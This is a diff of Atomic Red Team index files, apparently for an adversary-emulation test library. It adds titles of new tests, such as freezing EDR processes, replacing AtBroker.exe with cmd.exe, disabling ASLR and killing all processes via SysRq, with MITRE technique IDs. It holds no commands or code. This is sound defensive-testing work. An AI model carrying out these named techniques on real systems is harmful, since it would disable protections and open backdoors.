 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,11,Expand CAB with expand.exe,9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11,command_prompt
 defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
@@ -379,6 +380,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -577,6 +579,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -933,6 +936,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replac
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -236,7 +236,8 @@
 - T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -268,7 +269,8 @@
 - T1204.004 Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 
 # persistence
 - T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -308,7 +310,8 @@
 - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
+  - Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
 - T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -355,7 +358,8 @@
 - T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -401,7 +405,8 @@
 - T1219.002 Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
+  - Atomic Test #39: Curl Insecure Connection from a Pod [containers]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -606,7 +611,8 @@
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
+  - Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -229,6 +229,7 @@
   - Atomic Test #8: Hex decoding with shell utilities [linux, macos]
   - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
   - Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
+  - Atomic Test #11: Expand CAB with expand.exe [windows]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
   - Atomic Test #1: Windows Disable LSA Protection [windows]
   - Atomic Test #2: Disable journal logging via systemctl utility [linux]
@@ -670,6 +671,8 @@
   - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
   - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
   - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
+  - Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
+  - Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1086,6 +1089,7 @@
   - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
   - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
   - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
   - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1262,6 +1266,7 @@
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
@@ -1466,6 +1471,7 @@
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 
 # persistence
 - [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
@@ -1704,6 +1710,7 @@
   - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
   - Atomic Test #8: Create a new Windows admin user [windows]
   - Atomic Test #9: Create a new Windows admin user via .NET [windows]
+  - Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
 - T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
@@ -1728,6 +1735,7 @@
   - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
   - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
   - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
   - Atomic Test #1: Create a new Windows domain admin user [windows]
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -1907,6 +1915,7 @@
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.017 Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
@@ -2056,6 +2065,7 @@
   - Atomic Test #36: Windows push file using sftp.exe [windows]
   - Atomic Test #37: Windows pull file using sftp.exe [windows]
   - Atomic Test #38: Download a file with OneDrive Standalone Updater [windows]
+  - Atomic Test #39: Curl Insecure Connection from a Pod [containers]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]
@@ -2730,6 +2740,7 @@
   - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
   - Atomic Test #6: Launch DirLister Executable [windows]
   - Atomic Test #7: ESXi - Enumerate VMDKs available on an ESXi Host [windows]
+  - Atomic Test #8: Identifying Network Shares - Linux [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
   - Atomic Test #1: System Network Connections Discovery [windows]
   - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
@@ -2983,6 +2994,7 @@
   - Atomic Test #5: Linux - Stop service by killing process using killall [linux]
   - Atomic Test #6: Linux - Stop service by killing process using kill [linux]
   - Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
+  - Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -3087,7 +3099,8 @@
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
+  - Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -182,6 +182,7 @@
   - Atomic Test #43: Disable Memory Swap [linux]
   - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
   - Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI [linux]
+  - Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -777,6 +778,7 @@
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
   - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
   - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
+  - Atomic Test #8: Identifying Network Shares - Linux [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
   - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -832,6 +834,7 @@
   - Atomic Test #5: Linux - Stop service by killing process using killall [linux]
   - Atomic Test #6: Linux - Stop service by killing process using kill [linux]
   - Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
+  - Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -887,7 +890,8 @@
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
+  - Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -142,6 +142,7 @@
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
   - Atomic Test #2: Certutil Rename and Decode [windows]
+  - Atomic Test #11: Expand CAB with expand.exe [windows]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
   - Atomic Test #1: Windows Disable LSA Protection [windows]
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
@@ -482,6 +483,7 @@
   - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
   - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
   - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
+  - Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -777,6 +779,7 @@
   - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
   - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
   - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
   - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1245,6 +1248,7 @@
   - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
   - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
   - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
   - Atomic Test #1: Create a new Windows domain admin user [windows]
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]

atomics/Indexes/Matrices/linux-matrix.md

@@ -14,7 +14,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
